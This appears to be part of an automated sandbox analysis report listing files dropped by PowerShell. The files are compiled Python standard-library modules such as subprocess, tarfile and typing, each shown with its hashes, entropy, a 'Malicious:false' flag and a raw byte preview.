                                                                                                    SSDEEP:192:JOQtoTT8nApIGjxs15joJ3Xa/ZlqElqwJ8WniaGnOCXGsH:FiTT8nApLj+15joJ3K/fqiqwJ8WvmOCH
                                                                                                    MD5:FAE67554CB6195691FA063E3D5E78BC4
                                                                                                    SHA1:403407FADA6B9F30C5ADD0573884FE999979AC60
                                                                                                    SHA-256:001DE2A63CB95563C330849A574A8A185979A382965B0D450202AB3DA92E5692
                                                                                                    SHA-512:F9E02B0821C34516534078C81E3DF5FF0F114A40EA51477CC43A4346AEEDC4E9668FC01A085CF3C1C4AA62B84E457B6F4DD24495C9DFB1895D66D5BAF3611193
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f?/..............................d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e.z...Z.d.Z.e.d.z...d.z...Z.d.Z.d.Z.e.e.z...e.z...e.z...Z.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z...G.d...d.........Z.e.j)..............................G.d...d.........Z.y.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25199
                                                                                                    Entropy (8bit):5.848310195497802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:9roL8qz5Tzc29JmqtvtcNSgJzQENigaIjzEVsWQ82:hyzVtJjckgJzQENipQzEg9
                                                                                                    MD5:1693B0F8ACF1C2067F5BF403C36645A2
                                                                                                    SHA1:EDC746BB0095F51C500F4E2AF785AD3122C4B674
                                                                                                    SHA-256:4EC2C0F397FFE5F0BBBF9C1E461341BAEA0C2C087E740C5856E9EB3066C1B42B
                                                                                                    SHA-512:C6048CC3738A5BB11CB94EC831F79E7BCA6C8BEB7719C4E20D4BBA26F68443906B506C553380BD1A8CD72891A8D6C72302E0185C73E3F67E7E1FF2BD1A6AB838
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.3........................F.....d.Z.d.d.l.m.Z...e.j...................d.k(..s.J...d...Z...e.g.d.....e...e.d.d.................z...........Z.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..i.d+d,..d-d...d/d0..d1d...d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK....i.dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZdK..d[dM..d\dO..d]dQ..d^dS..d_dU..d`dW..dadY..dbdc..ddde....i.dfdg..dhdi..djdk..dldm..dndo..dpdq..drdc..dsde..dtdg..dudi..dvdk..dwdm..dxdo..dydq..dzd{..d|d}..d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d{..d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):364
                                                                                                    Entropy (8bit):5.303390203933865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:hSFknDgIGvXhz5EJ0YKyYg6FraMaVkoopnBWWMlA+ein23d6jaeyfUF:hfcI65WJlKvjFrDaVkoeBFMlA+ebIjaY
                                                                                                    MD5:29AE69BAD548BCB4ADC79ED4BD7F073D
                                                                                                    SHA1:4CE183AF84F7CB3C428EF87D97C03C871417026D
                                                                                                    SHA-256:038EF897CE5864486E09285946D54C459421B7D10253565C1E2A13857D78B6A9
                                                                                                    SHA-512:FB90F1DDDDADD634AF51D8AF4D0CD0A8B5011C754D068410BC723C3F6A442F8BDF8105D69F4F77539C5FFB8C446ECE7DBCD84A2F40483D3B7F54FE4E76FB3E08
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................g.d...Z.d.d.l.....d.d.l.m.Z...d.d.l.m.Z...y.).)...calcsize..pack..pack_into..unpack..unpack_from..iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__.._structr....r............DC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\struct.py..<module>r........s...........................r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2834750695844772065132563628738740224.000000, slope 174557683800002081645920256.000000
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79226
                                                                                                    Entropy (8bit):5.323542182258046
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:XeRXvfdkqsRccnN1EkHlEVqnGMJccTkTGvCVk/Q:XeRXvfeRccNSkTG8ccTkTEo
                                                                                                    MD5:B0B3A8C118240919D029ECF81BB8CDCC
                                                                                                    SHA1:B93AB3166B08A29AAC063B811FA7BBC08DD08820
                                                                                                    SHA-256:0ACA39BFED7B99EE96F37B8A280953432BB2905C47927DB8B9AC89E874E84B3D
                                                                                                    SHA-512:A0256B2EE570AE6549AEC33583E509AD63F055D2D158B6982BEA59EF9050B1DD8C9CBEA0AA07BA9FC7E12D08AED4D69EB5DDCA81CCD8EC3F72EF8B35F5BDB523
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f=c.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z...d.d.l.Z.g.d...Z...d.d.l.Z.d.Z.e.j*..................d.v.Z.e.r@d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)..e.jU..................g.d.............nYe.rCd.d.l+m,Z-..e.j\..................Z/e.j`..................Z1e.jd..................Z3e.jh..................Z5e.jl..................Z7n.d.Z-d.Z/d.Z1d.Z3d.Z5d.Z7d.d.l8Z8d.d.l9Z9..G.d...d.e:........Z;..G.d...d.e;........Z<..G.d...d.e;........Z=e.r...G.d...d.........Z>..G.d...d.e?........Z@n,..eAe8d.d.........ZB..eCe9d.........r.e9j...................ZEn.e9j...................ZEe.r.d.ZGd...ZHn.g.ZGd...ZHd.ZId.ZJd.ZKd...ZLd...ZMd...ZNd.d ..d!..ZOd"..ZPd.d ..d#..ZQ..G.d$..d%eR........ZSd.d.d.d.d&..d'..ZTd(..ZUd.d.d)..d*..ZVd.d.d)..d+..ZWd,..ZX..eX........ZYd.ZZ..G.d-..d.........Z[y.#.e.$.r...d.Z.Y.....w.x.Y.w.#.e.$.r...d.Z.Y.....w.x.Y.w.)/a....Sub
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29104
                                                                                                    Entropy (8bit):5.45302854467781
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:nmqI3H3Apn9bLSP9ILoCA3PrzDLb1NyhLHfVCIyujjtYqJs/8gzQUIsb+5:TIXAd96qoF3jzXb1EtXUqe/8gzQUIsu
                                                                                                    MD5:A4DEEE2B42DFA2082ABBFA3506FDBD73
                                                                                                    SHA1:57751B0F456F3AF669FC931332B02120FA050DC6
                                                                                                    SHA-256:9FF0E2E2E2DEF116EF659F077625621DED674815EC32AED682DAD9AC265DC6B4
                                                                                                    SHA-512:0C785F621E17C2C55B62545121304BA261CA7E8C23C24EFA6DBBB7695B5FACFFBF5F6FC0CC51820CF6033B7D30E2852789FE906B0189F14C184F83707C9781E7
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.|..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.h.Z.d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d...Z.e.j...................d.k(..r.e.d.....e.d.<...n.e.d.....e.d.<...d...Z...e.........d.u.Z.e.r!e.d.d.d.d.d.d d!d"..d#d#d$d$d%d&d!d"..d'd'd(d(d%d&d!d"..d)..z...Z.d"Z.e.j...................j...........................d.....Z.e.j ..................d.......d*e.j ..................d+........Z.e.j ..................d.......e.j ..................d+........Z.e.j&..................j)..................e.j*..........................Z.e.j&..................j)..................e.j...........................Z.e.j&..................j)..................e.j2..........................Z.e.j&..................j)..................e.j6..........................Z...e.j:..........................Z.d.a.d,a d.Z!d-Z"d.Z#d/Z$d0..Z%e.jL..................r,e.j&..................jO....................e%e.jL............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):119379
                                                                                                    Entropy (8bit):5.203683715176227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:tbqJwPjFfRrQJM2jf8C6R8fC9YhjDa05o9im+1grWgEVQ9MtF5xI4LqxeOc73:bQ1a4auoZ+OrJOd5Oc7
                                                                                                    MD5:BF13009CBB92303F86544F3CE3AFB93B
                                                                                                    SHA1:0417CB76BF1A37BE043B8E24E95DC0E1B180B92E
                                                                                                    SHA-256:B501C1264688186CCFFDEE3CB48A21F5FF756B61677FF2818DF5481FAB290DAF
                                                                                                    SHA-512:60E4A0ECE0B792CFDF985B22B103E1B31793C5A1AFB3B88FFF1C18423DB0123EF580F3A741FF882D4EC5536465A5B0BC68F3BD7D7C947511F7178E8B312C6EB3
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..............................d.Z.d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z...d.d.l.Z.e.e.e.f.Z.g.d...Z.d.Z.d.Z.e.d.z...Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(d.Z)d.Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2e2Z3e!e"e#e$e'e(e)e%e&e*e+e,f.Z4e!e"e)e,f.Z5e*e+e,f.Z6d.Z7h.d ..Z8e9e9e9e:e:e:d!..Z;e.jx..................d"k(..r.d#Z=n...e.j|..........................Z=d$..Z?d%..Z@d&..ZAd'e3f.d(..ZBd)..ZCd.e.d.f.d*..ZDd+..ZE..G.d,..d-eF........ZG..G.d...d/eG........ZH..G.d0..d1eG........ZI..G.d2..d3eG........ZJ..G.d4..d5eG........ZK..G.d6..d7eG........ZL..G.d8..d9eL........ZM..G.d:..d;eL........ZN..G.d<..d=eL........ZO..G.d>..d?eL........ZP..G.d@..dAeL........ZQ..G.dB..dC........ZR..G.dD..dE........ZS..G.dF..dGeT........ZU..G.dH..dIeT........ZV..G.dJ..dKe.j...........................ZX..G.dL..dMeG........ZY..G.dN..dOeY........ZZ..G.dP..dQeY........Z[..G.dR..dSeY........Z\..G.dT..dUeY........Z]..G.dV..dWeY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40437
                                                                                                    Entropy (8bit):5.12565711835023
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:de9a0qWQOLdWXoVxP9bZot1vZo/SCN2wR6:depL0oxPy1vitR6
                                                                                                    MD5:3812EC2492ABD61756A7EACEE6806B5D
                                                                                                    SHA1:633E5D0171F9F885A43DA816EA44E70FFBA69202
                                                                                                    SHA-256:BD35D4648368520624541538A9F29018C2A36601B05757B4FD768F10E9D12685
                                                                                                    SHA-512:E411AA07FA9A63BF723AFF5DF9ADADCCD11B1BDF5C3968AD6DA47CF35992A6C87C39B56E5C0901E224BDB861D397A4C4CDBEF9D1A2B0458E7050C83DAA950FC4
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j0..................Z.e.j4..................e.j6..................z...e.j8..................z...Z...e.e.d.........r.e.e.j>..................z...Z.e.Z ..e.e.d.........r.e e.jB..................z...Z ..e.e.d.........r.e.jD..................Z"n.d.Z"d.Z#..e.........Z$d...Z%d...Z&d...Z'..G.d...d.........Z(d...Z)d...Z*d.a+d...Z,d...Z-d...Z.d...Z/d...Z0d...Z1d.a2d...Z3d...Z4d...Z5d.d...Z6d/d...Z7d.e#d.f.d...Z8..G.d...d.........Z9..G.d ..d!........Z:......d0d.d"d#..d$..Z;e.jx..................d%k7..s.e.jz..................d&k(..r.e;Z>n...e.e.d'........a?......d1d.d(..d)..Z>..G.d*..d+e.j...........................ZA..G.d,..d-........ZBy.)2a....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race co
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18332
                                                                                                    Entropy (8bit):5.424205464499309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:nIBHMRmDM/m8C0l14YpQNjlNfBmVNVICMaO9:nIBrg4tlxWNVan9
                                                                                                    MD5:5E4561F1DE139BFE136390DC968BE8C4
                                                                                                    SHA1:FA26CB34234D7F8CEDC7662CE74B7C4225CC249B
                                                                                                    SHA-256:1AE578CFC17B7BEC919A446F6DB2E6BC479849C891ADAD445C0DFD007E63C08F
                                                                                                    SHA-512:D30F983F51515788039CE959010EEB91FECB0FE3222AF9B5FCD74C60ADF6D9CF353E54F518D74D2FD78422291626882BC6D6ADCDA5962347F4F1DCBCAFCBBF33
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.N..............................d.Z.d.d.l.Z.g.d...Z.d.Z...G.d...d.........Z.d.d...Z.d.d...Z.d...Z...e.j...................d.e.j...........................Z...e.j...................d.e.j...........................Z.d...Z.d.d...Z.e.d.k(..r...e...e.d...................y.y.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c..........................e.Z.d.Z.d.Z.e.j.....................e.e.e...........e.d.................Z.d.Z.d.Z.d...e.j...................e.........z...Z.d.e.d.d...z...Z...e.j ..................d.e.e.e.e.d...z...e.j"..........................Z.[.[.[...e.j ..................d.e.z...........Z.[...e.j ..................d.........Z.....................d.d.d.d...d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the d
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65385
                                                                                                    Entropy (8bit):5.175842288934097
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:pEwZem3bKsKYw107OcVWH4GTtrFZqWBFpK:Fq/H4kBO
                                                                                                    MD5:1A02150E0C58034FF079FBCB5520DA54
                                                                                                    SHA1:C244EA24DFCE0CFDD1A0ACF912D6B5E5F0F048B7
                                                                                                    SHA-256:F9C8DEA22F7BD17CDBDAF9FB4F55A1A61277CD51B864152BC4762E559B700469
                                                                                                    SHA-512:C53B87550D4BC92AB4C8B81B0650510FAB429A350BD4604B83084470ABC051A9B8629D29A9ADBD8669EB0DF7DB737B60C54E4D0722ADA28FB6CDE006D1DF5C50
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z...g.d...Z.e.j*..................Z.e.j...................Z.e.j2..................Z.e.j6..................Z.e.j8..................Z...e.j:..................Z...e.j>..................Z.d.Z e.jC..................d...........e.jD..................Z#..e.jH..................Z%e.jL..................Z&[.d.a'd.a(d...Z)d...Z*d...Z+d...Z,d...Z-d...Z.e.Z/d...Z$..G.d...d.........Z0e0Z1..G.d...d.........Z2..G.d...d.........Z3..G.d...d.e3........Z4..G.d...d.........Z5..G.d...d.........Z6..G.d...d e7........Z8..e.d!........jr..................Z:d"..Z;..e$........a<i.Z=i.Z>..e.........Z?..e.........a@..eA........aBd#..ZC..G.d$..d%........ZD..d.d&l.mEaFmGZH..t.........ZMd-..ZN..G.d...d/eD........ZO..G.d0..d1eD........ZP..G.d2..d3eD........ZQd4..ZRd5..ZSd6..ZTd7..ZUd8..ZVd9..ZWg.ZXd.aYd:..ZZd.d;l.m[Z[....eP........a\d<..Z]d=..Z^..d.d>l.m_Z`..d@..Zb..ece.dA........r...e.j.........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3596
                                                                                                    Entropy (8bit):6.055713200971082
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:zmHWiYnr6SUOhIlPBJR7zpPrK5Qylp1je6JQm/GY0BW1+kdm+TFoQ0iT6um/n:qHWiKf25n5+5lp9lJQ8GYh+ExQimhn
                                                                                                    MD5:76A186FAEAF00081C0D52DDB1D5F0C04
                                                                                                    SHA1:CEF9453949E10911DBFDFF8DCCD01351F3ACE244
                                                                                                    SHA-256:096C87BF903113E77F8BEC38940B98C662B1567D35E92A3A52FD782671327296
                                                                                                    SHA-512:D1D186DAD6BF0091994EF4A0F7976800C8D9C86CDCB94C60368DBBCD9653CF9CBA18A5926F2F0154924EF81B4497680CEF4385446668E6D610B65698B7CB5B9B
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f=...............................d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDZDdEZEdFZFdGZG..eH........j...........................D.....c.i.c.]"..\...}.}...eJ|.eK........r.|.j...................dH........s.|.|....$..c.}.}.ZMe.j...................eMj.....................................i.dIe8..dJe...dKe...dLe*..dMe...dNe+..dOe...dPe...dQe...dRe%..dSe0..dTe(..dUe...dVe&..dWe...dXe...dYe'..i.dZe5..d[e...d\e6..d]e...d^e1..d_e2..d`e)..dae...dbe7..dce...dde...dee#..dfe...dge...dhe...die...dje.....e e$e/e3e4e.e.e"e-e.e.e,e.e!dk....ZPdl..ZQdm..ZRdn..ZSyoc...c.}.}.w.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF............................................................................................................................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24814
                                                                                                    Entropy (8bit):5.661852434421576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:lmqmN0rU7dWJfETCat27aqNqV7WIWzaRHqmmM:HARWJf9HaqmaRORHqmB
                                                                                                    MD5:127436EBA0EEC617CA11C38C4B6518B4
                                                                                                    SHA1:4152DBF9623912B4BF2CBF1D312E36A4494317B1
                                                                                                    SHA-256:4A59078622F652559945D491347B88EA85C9CCED9BCB1D9CA44C94B91CF1E3CA
                                                                                                    SHA-512:5DF3114FECF6513946C0B8BEA6FBC0954D44EE10CFB7CE1CCA5D3DD9CE5CFE154620EB98669E72A5384158B4F395DC6B7F2FA001DA37FBFF92055D9A8FC00390
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f(U........................T.....d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.....d.d.l.m.Z...d.d.l.Z...e.j(..................d.e.j*..........................Z...e.j(..................d.e.j*..........................Z.d.d.l.Z.e.j0..................g.d...z...Z.[...G.d...d...e.j2..................d.d.................Z.d...Z.d...Z.d...Z.d.Z.d.Z.e...e.d.e.z...........z.....e.e.........z...Z d.Z!d.Z"d.Z#d.Z$d.Z%..e.e"e#e$e%........Z&d.Z'..e.d.d...........e.e'........z...Z(d.e'z...Z)..e.e(e)........Z*..e.d.e*d z...........Z+..e.e+e*e&........Z,d!..Z-e.j\..................d"..........Z/..e...e-..........Z0d#Z1d$Z2d%Z3d&Z4..e.e0d'z...e0d(z...........Z5..e.e0d)z...e0d*z...........Z6..e...e7e.jp....................e9e.d+.,..................Z:..e.d-e:........Z;..e.e,e;e6e!........Z<e e<z...Z=..e.e0d.z.....e.d/d.........z...e0d0z.....e.d1d.........z...........Z>..e.d2e.e5........Z?e...e.e?e,e;e>e!........z...Z@i.ZA..e-........D.]"..ZB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51562
                                                                                                    Entropy (8bit):5.416373772582537
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:nIolzd+RU99ql+uln9Ppp3x/AEx5YqJ43GOzsayUH2wj7S/LyFdBt:IIMRk9qNl9PPOdrN2i+DML
                                                                                                    MD5:0DCB34D1001721F1B82ED2F616BC8C1B
                                                                                                    SHA1:306A222604D94A32EA810D46DF945402964FC867
                                                                                                    SHA-256:196785BD784916007DA11D4F7B3C799460B8333688E310B07341D37A178ECE64
                                                                                                    SHA-512:2954C0810593E143CE8AD7251186419B2B56DA60319BC5EE2EA32F7CE8BD7F7B07F8B1A147EB4B10B363B253D4655E636DAABFAE4DFB4C87CAA8592E27907234
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d9d...Z.d...Z.d:d...Z.d9d...Z.d9d...Z.d.Z.d.Z...G.d...d.........Z...e.........Z.d...Z.e.e.d.d.d.f.d...Z.e.e.d.d.f.d...Z.e.f.d...Z.d...Z.e.f.d...Z.d;d...Z.d<d...Z.d;d...Z.d=d...Z.d:d...Z.d:d...Z.d...Z ..G.d...d.........Z!d...Z"d...Z#d ..Z$d!..Z%d"Z&..G.d#..d$e'........Z(d%..Z)..e.jT..................d&g.d'..d(d)g..*........Z+d+..Z,d,Z-d-..Z...G.d...d/........Z/..G.d0..d1........Z0d2Z1d3Z2d4Z3d5Z4d6..Z5d7..Z6d8..Z7y.)>z@Extract, format and print information about Python stack traces......N)...suppress)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc..........................|...t.........j...................}.t.........j...................|.........j.................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14978
                                                                                                    Entropy (8bit):5.237366621192304
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:SNEoTSVEjOZZTsv9JH3xKotIdc/lJ/r4+yF:SNEiSVIYsv9NBKotIi/7/r4+yF
                                                                                                    MD5:C5D38A269D5B92E2BFDE072A30C45E33
                                                                                                    SHA1:23A0D92D7C87656B952439D7C8BBA43049BD535E
                                                                                                    SHA-256:83437236D1D5C63D0E5AB989E104CD3BBCE11EA2B3509BDED6BAC3376A360F5B
                                                                                                    SHA-512:7FF7179E86F9581D1F71459CA1C6959E0E9CFDA2840F26DF13F84FAB36B823CA10FD5C3966209021348E723269F22AFCC69CB089230C86EC5D2D6AE5C10CD505
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f>,........................@.....d.Z.d.d.l.Z.d...Z...e.e.........Z...e.d...........Z...e.e.j...........................Z...e.e.j...........................Z...e.e.j...........................Z.d...Z...e...e.................Z.d...Z...e...e.................Z.d...Z...e.........Z...e.e.........Z.e.j%............................d...Z...e.........Z...e.e.........Z...G.d...d.........Z...e...e.........j,..........................Z...e.e.........Z...e.g.j4..........................Z...e.e.j:..........................Z...e...e.........j>..........................Z ..e.e!jD..........................Z#..e.e$j...................d.............Z%..e.e.........Z&..e'..#.e'$.r8Z(..e.e(jR..........................Z*..e.e(jR..................jV..........................Z,Y.d.Z([(n.d.Z([(w.w.x.Y.w...e.e.j...........................Z-..e.e.j\..........................Z/[.[.[.[.[.[.[.d.d...Z0d...Z1d.d...Z2d...Z3d...Z4..G.d...d.........Z5..G.d...d.........Z6d...Z7..e.e8e9............Z:..e.e9e!z...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):141899
                                                                                                    Entropy (8bit):5.388281143443104
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:JKmtDbTXAEMnp4Tp8HTz1pUVND48KTCk0cRh2q:8mtAE6KezgrFy0M
                                                                                                    MD5:41B4631C9DF9A388D05FE993514454B1
                                                                                                    SHA1:EF21726D884EE7B997C10C3D749DA4279885A13F
                                                                                                    SHA-256:696ECFBCF3DCBD6143E9FF9C51AE2265E5B1A414AD8147708567863799EA78C4
                                                                                                    SHA-512:508145C5E4A7D9B8881F9C2246406E41C607E9755B8628B8D48CA86FFE7DCBDC7FF3F7ABD4A49A3A3F9A3A1820039DF213EED3172EEF8AB2E37D1C7E8C26EFB4
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f8..............................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d...Z.d.d.d...d...Z.d...Z d...Z!d...Z"d...Z#d...Z$d...Z%d.d...d...Z&d...Z'd...Z(d...Z)d...Z*g.Z+i.Z,d.d.d...d...Z-..e.........f.d...Z/..G.d...d.........Z0..G.d...d.........Z1..G.d ..d!e0e1d.."........Z2..G.d#..d$e2d.."........Z3..G.d%..d&e4........Z5..G.d'..d(e5.)........Z6e2d*..........Z7e2d+..........Z8e2d,..........Z9e2d-..........Z:e2d...........Z;e2d/..........Z<e2d0..........Z=d1..Z>e2d2..........Z?e3..e-d...........d3..................Z@e2d4..........ZAe2d5..........ZBe2d6..........ZC..G.d7..d8e0d.."........ZDd9e6d:eEf.d;..ZFd9e6d:eEf.d<..ZG..G.d=..d>........ZHd?..ZId@..ZJdA..ZKdB..ZLe-dC..........ZMdD..ZNdE..ZO..G.dF..dGe0d.."........ZP..G.dH..dIePd.."........ZQ..G.dJ..dKe1ePd.."........ZR..G.dL..dMeRd.."........ZS..G.dN..dOe1eQd.."........ZT..G.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33046
                                                                                                    Entropy (8bit):5.542692066530325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:WI7MhiFf2VybAHW4WFvKYDya8i5iPF+g4sCvPVW2LisQYzUN/TpxeCQ5u:WI70GOYb0J+v9SYzvhu
                                                                                                    MD5:E6666D77B88239FAEE265F51F40F4B24
                                                                                                    SHA1:98B0D78C45E8A5A988489451C79443645FC66074
                                                                                                    SHA-256:471B7AC80FBF507678D28DF19B316AC74048CBA41CAD131DEA34A91F244DBA80
                                                                                                    SHA-512:2E96EAD28664E1C7ACA30260B569F26AEBC17ECD509B51880E93CE6D827F5D35C18FFF916CAFF8F752EDC04040FA8FFF3286B78D1F96A55E89788264C3FFA524
                                                                                                    Malicious:false
